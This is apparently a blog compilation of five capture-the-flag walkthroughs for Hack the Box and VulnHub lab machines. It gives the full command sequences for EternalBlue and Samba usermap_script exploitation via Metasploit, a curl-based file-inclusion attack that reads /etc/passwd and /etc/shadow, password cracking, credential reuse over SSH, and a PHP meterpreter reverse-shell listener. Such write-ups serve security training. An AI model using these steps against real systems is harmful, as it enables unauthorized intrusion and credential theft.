Hack the Box Challenge: Blue Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Blue” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Blue lab.

Level: Beginners

Task: find user.txt and root.txt file in victim’s machine.

Let’s begin the Game!!

Since these labs are online available therefore they have static IP and IP of blue is 10.10.10.40 so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.40 --open

From given below image, you can observe that we found so many open ports and port 137, 139 and 445 denotes that it is windows machine.

When I extract complete result of nmap I found following details

·         OS: windows 7 professional

·         Computer name: haris-pc

·         NetBIOS computer name haric-pc

·         Smb version: 2.02

Great!! Form this result I can conclude username can be “haris” moreover smb 2.02 can be exploit by eternal blue vulnerability.

Let confirm eternal blue vulnerability in victims system using namp script.

nmap --script vuln -p445 10.10.10.40

Awesome!! Victim’s machine is vulnerable to eternal blue exploit. 

Then I run msfconsole command in terminal and load metasploit framework for using eternal blue module for exploiting target machine.

use exploit/windows/smb/ms17_010_eternalblue

msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40

msf exploit(windows/smb/ms17_010_eternalblue) >run

Terrific!! I have got unauthorized access of victims command shell through session 1 as shown in below image.

Inside c:\Users\haris \Desktop I found user.txt file and used type “file name” command for reading this file.

cd Desktop

type user.txt

 Great!! We got our 1^st flag successfully 

Inside c:\Users\Administrator \Desktop I found root.txt file and used type “file name” command for reading this file.

cd Desktop

type root.txt

Great!! We got our 2^st flag successfully.

It was very easy challenge for those candidate who have knowledge little know vulnerability analysis.

Happy Hacking!!

Hack the Box Challenge: Lame Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Lame” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Lame lab.

Level: Beginners

Task: find user.txt and root.txt file in victim’s machine.

Let’s begin the Game!!

Since these labs are online available therefore they have static IP and IP of Lame is 10.10.10.3 so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.3

From given below image, you can observe that we found so many open ports such as 21 for ftp, 22 for ssh, 139 and 445 for samba service and also got hit OS platform can be Unix or linux.

 From nmap result we saw samba service smbd 3.x is running in victim’s machine therefore next I search for any exploit related to this service in Google.

Gratefully Google gave me hint in their 2^nd link of exploit DB.

Then I run msfconsole command in terminal and load metasploit framework for using Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution module for exploiting target machine.

use exploit/multi/samba/usermap_script

msf exploit(multi/samba/usermap_script) > set rhost 10.10.10.3

msf exploit(multi/samba/usermap_script) > exploit

Terrific!! I have got unauthorized access of victims command shell through session 1 as shown in below image.

I had updated command shell into meterpreter shell by executing following command.

session -u 1

Inside path: /home/makis I found user.txt file and used cat “file name” command for reading this file.

cd home

ls

cd makis

ls

cat user.txt

Great!! We got our 1^st flag successfully

Inside path: /root I found root.txt file and used cat “file name” command for reading this file.

cd root

ls

cat root.txt

Great!! We got our 2^st flag successfully

It will be very stress-free challenge for those candidate who have knowledge little know vulnerability analysis.

Happy Hacking!!

Hack the Box Challenge: Blocky Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Blocky ” which is available online for those who want to increase their skill penetration testing and black box testing. Blocky is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level. We are going to start a new series of hack the box beginning with Blocky craft which is designed for beginners.

Since these labs are online available therefore they have static IP and IP of blocky is 10.10.10.37 so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.37

From given below image, you can observe we found port 21, 22, 80 are open in victim’s network.

Knowing port 80 is open in victim’s network I preferred to explore his IP in browser but didn’t get any remarkable clue on its welcome page for next step.

Next we use dirb tool of kali to enumerate the directories and found some important directories such as /phpmyadmin, /wp-admin, /plugin/files and etc which you can confirm from below image.

dirb http://10.10.10.37 /

After browsing so many directories I found plugin/files a bit interested by execute following URL in browser.

http://10.10.10.37/plugin/files.

From given below image you can observe that it has shown two jar file. Let’s download blockycore.jar file and then move for its compilation.

Using online compliers I had complied blockycore.jar file and found something very interesting in it. It contains login credential sqluser and sqlpass as highlighted in below image.

Then I explore http://10.10.10.37/phpmyadmin and login into phpmyadmin server using above credential root: 8YsqfCTnvxAUeduzjNSXe22

Then opened the wordpress database for stealing username from here and I found a user login: Notch with user Id 1.

Now I try to access victim’s system PTs shell through SSH since port 22 is open as per nmap result and I had also found a user name therefore I open a new terminal in kali executed following command to connecting with target network through ssh service.

ssh notch@10.10.1037

For password I try above password found in jar file and got successful login into victims shell.

id

From id result I came to know Notch is first user of system.

By executing sudo -l command it tell us that user Notch has full privileged in this machine.

Then I moved for root access using previous same password and again I get root access successfully.

sudo su

Then inside its home directory I found user.txt file and used cat command for reading this file.

ls

cat user.txt        

Gracefully!! We found 1^st flag of this Lab in user.txt.

Then I moved into root directory where I found root.txt and again use cat command for reading this file.

cd root

ls

cat root.txt

Great!!! We completed this challenge by capturing 2^nd flag in root.txt file.

Hack the W1R3S.inc VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as W1R3S.inc. The credit for making this vm machine goes to “SpecterWires” and it is another capture the flag challenge in which our goal is to gain root access and capture the flag to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let’s start from getting to know the IP of VM (Here, I have it at 192.168.1.106 but you will have to find your own)

netdiscover

Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

nmap -p- -A 192.168.1.106 --open

Awesome!! Nmap has done remarkable job by dumbing the details of services running on open port 21, 22 and 80.

Knowing port 80 is open in victim’s network I preferred to explore his IP in browser but didn’t get any clue on its home page for next step.

Next we use dirb  tool of kali to enumerate the directories and found some important directories such as /administrator /installation and /wordpress /

dirb http://192.168.1.106 /

So next I decided to explore http://192.168.1.106/administrator/installation through browser URL and received installation page as shown in given below image. Moreover noticed that the author has used Cuppa CMS.

With the help of Google I check out for any exploit related to cuppa CMS. And from Google search result, I found exploit 25971 in its first link.

This exploit was pointing toward Cuppa CMS File Inclusion vulnerability. The exploit having hint for exploiting LFI or RFI vulnerability, taking let help from highlighted hint let’s try to exploit our victim.

According to our condition we need to paste malicious code in URL as http:192.168.1.106 /administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd for exploiting lfi vulnerability.

Sadly!! Again didn’t get anything accept following blank page of configuration.

After wasting a lot of time on browser I decided to use curl for exploiting LFI vulnerability for obtaining etc/password file.

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.1.106/administrator/alerts/alertConfigField.php

When I executed above command for exploring etc/password file, it successfully work and I found first username “w1r3s”.

Then again I executed below command for obtaining password file by using same process.

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.1.106/administrator/alerts/alertConfigField.php

Successfully I found salt password of user w1r3s as shown in given below image. Then I copied this password in a text file as pass.txt for cracking it with john the ripper.

Next I had used john the ripper for cracking pass.txt and from given below image you can observe the highlighted text “computer” as plain text password.

Hence we found username: w1r3s and password: computer

If you remember the output result of nmap then it was showing port 22 is open for SSH. We had also grabbed the username and password, now without wasting timing let login into SSH using above credential username: w1r3s and password: computer.

ssh wlr3s@192.168.1.106

Wonderful!! We have successfully access PTs shell through SSH of victims system.

id

lsb_release -a

Since author has given two the challenges i.e. (i) take root access (ii) capture the Flag.

Let’s take root access through sudo -i command as shown in below image.

Congratulation!! We got root login successfully.

For capturing flag I look into all directories and found flag.txt file. With help of cat command I successfully captured the flag and complete the all challenges of this vm.

ls-la

cat flag.txt

Solving challenge in this lab is not that much hectic therefore it is good task for beginners.

Hack the Vulnupload VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as Vulnupload. The credit for making this vm machine goes to “Mohammad Khreesha” and it is another capture the flag challenge in which our goal is to capture all the flags to complete the challenge. You can download this VM.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.102 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -p- -A 192.168.1.102 --open

Nmap scan tells us that port 22 and 80 are open,as port 80 is running http we open it in our browser. When we open the ip we find a login page we use dirb to enumerate the directories and found 2 important directories called /flag/ and /admin_area/

dirb http://192.168.0.26/

We first open the flag directory and find the 1st flag.

Then we open the directory called /admin_area/.

The page itself doesn't tell much but when we take a look at the source code we find our 2nd flag and the username and password to login through the home page.

When we login through the home page, we find a page that can be used to upload files.

We create a php reverse shell payload using msfvenom and upload it to our target machine.

Now dirb scan showed us a page called uploaded_files we use an educated guess and execute our file in that directory.

Now we setup our listener before executing our shell. As soon as we execute our shell we will get the reverse shell of the target system.

msf > use multi/handler

msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.0.18

msf exploit(multi/handler) > set lport 4444

msf exploit(multi/handler) > run

Now we find a file called hint.txt, when we open it we find our 3rd flag.

We find all the files that belong to user technawi, and we find a file called crendtials.txt in /etc/mysql/conf.d/credentials.txt

When we open the file we get our 4th flag and the password for user technawi.

Now we login through ssh using these credentials in the target machine.

ssh technawi@192.168.0.26

Now we open the file called flag.txt and find our 5th and final flag.